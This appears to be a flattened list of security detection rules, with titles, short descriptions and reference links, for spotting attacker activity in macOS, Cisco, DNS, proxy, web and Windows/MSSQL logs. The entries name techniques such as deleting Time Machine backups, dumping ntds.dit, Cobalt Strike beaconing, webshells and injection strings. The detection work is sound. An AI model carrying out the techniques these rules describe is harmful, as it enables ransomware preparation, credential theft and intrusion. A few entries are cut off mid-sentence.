Time Machine Backup Deletion Attempt Via Tmutil - MacOS Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/
Time Machine Backup Disabled Via Tmutil - MacOS Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". An attacker can use this to prevent backups from occurring. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/
New File Exclusion Added To Time Machine Via Tmutil - MacOS Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/
Potential WizardUpdate Malware Infection Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97, https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset, https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/
Gatekeeper Bypass via Xattr Detects macOS Gatekeeper bypass via xattr utility https://github.com/redcanaryco/atomic-red-team/blob/1fed40dc7e48f16ed44dcdd9c73b9222a70cca85/atomics/T1553.001/T1553.001.md, https://www.loobins.io/binaries/xattr/
Potential XCSSET Malware Infection Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08, https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset
Cisco Clear Logs Clear command history in network OS which is used for defense evasion https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html, https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609
Cisco Collect Data Collect pertinent data from the configuration files https://blog.router-switch.com/2013/11/show-running-config/, https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm, https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html
Cisco Crypto Commands Show when private keys are being exported from the device, or when new certificates are installed https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html
Cisco Disabling Logging Turn off logging locally or remote https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf
Cisco Discovery Find information about network devices that is not stored in config files https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html
Cisco Denial of Service Detect a system being shutdown or put into different boot mode None
Cisco File Deletion See what files are being deleted from flash file systems None
Cisco Show Commands Input See what commands are being input into the device by other people, full credentials can be in the history None
Cisco Local Accounts Find local accounts being created or modified as well as remote authentication configurations None
Cisco Modify Configuration Modifications to a config that will serve an adversary's impacts or persistence None
Cisco Stage Data Various protocols maybe used to put data on the device for exfil or infil None
Cisco Sniffing Show when a monitor or a span/rspan is setup or modified None
Cisco BGP Authentication Failures Detects BGP failures which may be indicative of brute force attacks to manipulate routing https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
Cisco LDP Authentication Failures Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
DNS Query to External Service Interaction Domains Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE https://twitter.com/breakersall/status/1533493587828260866
Cobalt Strike DNS Beaconing Detects suspicious DNS queries known from Cobalt Strike beacons https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
Monero Crypto Coin Mining Pool Lookup Detects suspicious DNS queries to Monero mining pools https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/
Suspicious DNS Query with B64 Encoded String Detects suspicious DNS queries using base64 encoding https://github.com/krmaxwell/dns-exfiltration
Telegram Bot API Request Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind https://core.telegram.org/bots/faq, https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/, https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/, https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/
DNS TXT Answer with Possible Execution Strings Detects strings used in command execution in DNS TXT Answer https://twitter.com/stvemillertime/status/1024707932447854592, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1
Wannacry Killswitch Domain Detects wannacry killswitch domain dns queries https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign
Cleartext Protocol Usage Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf
Huawei BGP Authentication Failures Detects BGP failures which may be indicative of brute force attacks to manipulate routing. https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
Juniper BGP Missing MD5 Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing. https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
MITRE BZAR Indicators for Execution Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE https://github.com/mitre-attack/bzar#indicators-for-attck-execution
MITRE BZAR Indicators for Persistence Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE. https://github.com/mitre-attack/bzar#indicators-for-attck-persistence
Potential PetitPotam Attack Via EFS RPC Calls Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp, https://msrc.microsoft.com/update-guide/vulnerability/ADV210003, https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf, https://threatpost.com/microsoft-petitpotam-poc/168163/
Possible PrintNightmare Print Driver Install Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy. https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29, https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527, https://github.com/corelight/CVE-2021-1675, https://old.zeek.org/zeekweek2019/slides/bzar.pdf, https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/
SMB Spoolss Name Piped Usage Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled. https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1, https://dirkjanm.io/a-different-way-of-abusing-zerologon/, https://twitter.com/_dirkjan/status/1309214379003588608
Default Cobalt Strike Certificate Detects the presence of default Cobalt Strike certificate in the HTTPS traffic https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468
DNS Events Related To Mining Pools Identifies clients that may be performing DNS lookups associated with common currency mining pools. https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml
New Kind of Network (NKN) Detection NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma> https://github.com/nknorg/nkn-sdk-go, https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/, https://github.com/Maka8ka/NGLite
Suspicious DNS Z Flag Bit Set The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs' https://twitter.com/neu5ron/status/1346245602502443009, https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma, https://tools.ietf.org/html/rfc2929#section-2.1, https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS
DNS TOR Proxies Identifies IPs performing DNS lookups associated with common Tor proxies. https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml
Executable from Webdav Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/ http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html, https://github.com/OTRF/detection-hackathon-apt29
OMIGOD HTTP No Authentication RCE Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request. https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://twitter.com/neu5ron/status/1438987292971053057?s=20
WebDav Put Request A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration. https://github.com/OTRF/detection-hackathon-apt29/issues/17
Publicly Accessible RDP Service Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service. https://attack.mitre.org/techniques/T1021/001/
Remote Task Creation via ATSVC Named Pipe - Zeek Detects remote task creation via at.exe or API interacting with ATSVC namedpipe https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html
Possible Impacket SecretDump Remote Activity - Zeek Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html
First Time Seen Remote Named Pipe - Zeek This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes https://twitter.com/menasec1/status/1104489274387451904
Suspicious PsExec Execution - Zeek detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html
Suspicious Access to Sensitive File Extensions - Zeek Detects known sensitive file extensions via Zeek Internal Research
Transferring Files with Credential Data via Network Shares - Zeek Transferring files with well-known filenames (sensitive files with credential data) using network shares https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Kerberos Network Traffic RC4 Ticket Encryption Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting https://adsecurity.org/?p=3458
Apache Segmentation Fault Detects a segmentation fault error message caused by a crashing apache worker process http://www.securityfocus.com/infocus/1633
Apache Threading Error Detects an issue in apache logs that reports threading related errors https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md
Nginx Core Dump Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts. https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps, https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/
Download from Suspicious Dyndns Hosts Detects download of certain file types from hosts with dynamic DNS names (selected list) https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats
Windows WebDAV User Agent Detects WebDav DownloadCradle https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
Download From Suspicious TLD - Blacklist Detects download of certain file types from hosts in suspicious TLDs https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap, https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf, https://www.spamhaus.org/statistics/tlds/, https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/
Download From Suspicious TLD - Whitelist Detects executable downloads from suspicious remote systems Internal Research
F5 BIG-IP iControl Rest API Command Execution - Proxy Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash, https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029, https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516
HackTool - CobaltStrike Malleable Profile Patterns - Proxy Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods). https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile, https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100, https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile, https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/, https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile
HackTool - BabyShark Agent Default URL Pattern Detects Baby Shark C2 Framework default communication patterns https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
HackTool - Empire UserAgent URI Combo Detects user agent and URI paths used by empire agents https://github.com/BC-SECURITY/Empire
PUA - Advanced IP/Port Scanner Update Check Detect the update check performed by Advanced IP/Port Scanner utilities. https://www.advanced-ip-scanner.com/, https://www.advanced-port-scanner.com/
PwnDrp Access Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity https://breakdev.org/pwndrop/
Raw Paste Service Access Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form https://www.virustotal.com/gui/domain/paste.ee/relations
Flash Player Update from Suspicious Location Detects a flashplayer update from an unofficial location https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb
Suspicious Network Communication With IPFS Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages. https://blog.talosintelligence.com/ipfs-abuse/, https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11, https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638
Telegram API Access Detects suspicious requests to Telegram API without the usual Telegram User-Agent https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/, https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/, https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/
APT User Agent Detects suspicious user agent strings used in APT malware in proxy logs Internal Research
Suspicious Base64 Encoded User-Agent Detects suspicious encoded User-Agent strings, as seen used by some malware. https://deviceatlas.com/blog/list-of-user-agent-strings#desktop
Bitsadmin to Uncommon IP Server Address Detects Bitsadmin connections to IP addresses instead of FQDN names https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027
Bitsadmin to Uncommon TLD Detects Bitsadmin connections to domains with uncommon TLDs https://twitter.com/jhencinski/status/1102695118455349248, https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/
Crypto Miner User Agent Detects suspicious user agent strings used by crypto miners in proxy logs https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65, https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h
HTTP Request With Empty User Agent Detects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method. https://twitter.com/Carlos_Perez/status/883455096645931008
Exploit Framework User Agent Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/
Hack Tool User Agent Detects suspicious user agent strings user by hack tools in proxy logs https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb, http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules
Malware User Agent Detects suspicious user agent strings used by malware in proxy logs http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules, http://www.botopedia.org/search?searchword=scan&searchphrase=all, https://networkraptor.blogspot.com/2015/01/user-agent-strings.html, https://perishablepress.com/blacklist/ua-2013.txt, https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents, https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q, https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large, https://twitter.com/crep1x/status/1635034100213112833
Windows PowerShell User Agent Detects Windows PowerShell Web Access https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest
Rclone Activity via Proxy Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string https://rclone.org/, https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone
Suspicious User Agent Detects suspicious malformed user agent strings in proxy logs https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb
Potential Base64 Encoded User-Agent Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding. https://blogs.jpcert.or.jp/en/2022/07/yamabot.html, https://deviceatlas.com/blog/list-of-user-agent-strings#desktop
Suspicious External WebDAV Execution Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns. https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462, https://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html, https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
F5 BIG-IP iControl Rest API Command Execution - Webserver Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash, https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029, https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516
Successful IIS Shortname Fuzzing Scan When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol "~" https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml, https://www.exploit-db.com/exploits/19525, https://github.com/lijiejie/IIS_shortname_Scanner
Java Payload Strings Detects possible Java payloads in web access logs https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/, https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/, https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md, https://twitter.com/httpvoid0x2f/status/1532924261035384832, https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035
JNDIExploit Pattern Detects exploitation attempt using the JNDI-Exploit-Kit https://github.com/pimps/JNDI-Exploit-Kit, https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit
Path Traversal Exploitation Attempts Detects path traversal exploitation attempts https://github.com/projectdiscovery/nuclei-templates, https://book.hacktricks.xyz/pentesting-web/file-inclusion
Source Code Enumeration Detection by Keyword Detects source code enumeration that use GET requests by keyword searches in URL strings https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html, https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1
SQL Injection Strings In URI Detects potential SQL injection attempts via GET requests in access logs. https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/, https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/, https://brightsec.com/blog/sql-injection-payloads/, https://github.com/payloadbox/sql-injection-payload-list, https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection
Server Side Template Injection Strings Detects SSTI attempts sent via GET requests in access logs https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection, https://github.com/payloadbox/ssti-payloads
Suspicious User-Agents Related To Recon Tools Detects known suspicious (default) user-agents related to scanning/recon tools https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb, https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst, https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92
Suspicious Windows Strings In URI Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/
Webshell ReGeorg Detection Via Web Logs Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg. https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3, https://github.com/sensepost/reGeorg
Windows Webshell Strings Detects common commands used in Windows webshells https://bad-jubies.github.io/RCE-NOW-WHAT/, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
Cross Site Scripting Strings Detects XSS attempts injected via GET requests in access logs https://github.com/payloadbox/xss-payload-list, https://portswigger.net/web-security/cross-site-scripting/contexts
Mimikatz Use This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups) https://tools.thehacker.recipes/mimikatz/modules
Microsoft Malware Protection Engine Crash This rule detects a suspicious crash of the Microsoft Malware Protection Engine https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5, https://technet.microsoft.com/en-us/library/security/4022344
Potential Credential Dumping Via WER - Application Detects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55
Ntdsutil Abuse Detects potential abuse of ntdsutil to dump ntds.dit database https://twitter.com/mgreen27/status/1558223256704122882, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)
Dump Ntds.dit To Suspicious Location Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location https://twitter.com/mgreen27/status/1558223256704122882, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)
Audit CVE Event Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log. https://twitter.com/VM_vivisector/status/1217190929330655232, https://twitter.com/DidierStevens/status/1217533958096924676, https://twitter.com/FlemmingRiis/status/1217147415482060800, https://www.youtube.com/watch?v=ebmW42YYveI, https://nullsec.us/windows-event-log-audit-cve/
Backup Catalog Deleted Detects backup catalog deletions https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx, https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
Application Uninstalled An application has been removed. Check if it is critical. https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/Microsoft-Windows-MsiServer.xml, https://learn.microsoft.com/en-us/windows/win32/msi/event-logging
Restricted Software Access By SRP Detects restricted access to applications by the Software Restriction Policies (SRP) policy https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv
MSI Installation From Suspicious Locations Detects MSI package installation from suspicious locations https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html
MSI Installation From Web Detects installation of a remote msi file from web. https://twitter.com/_st0pp3r_/status/1583922009842802689
Atera Agent Installation Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent
MSSQL Add Account To Sysadmin Role Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
MSSQL Disable Audit Settings Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16, https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16
MSSQL Server Failed Logon Detects failed logon attempts from clients to MSSQL server. https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/, https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html
MSSQL Server Failed Logon From External Network Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack. https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/, https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html
MSSQL SPProcoption Set Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16
MSSQL XPCmdshell Suspicious Execution Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
MSSQL XPCmdshell Option Change Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed. https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
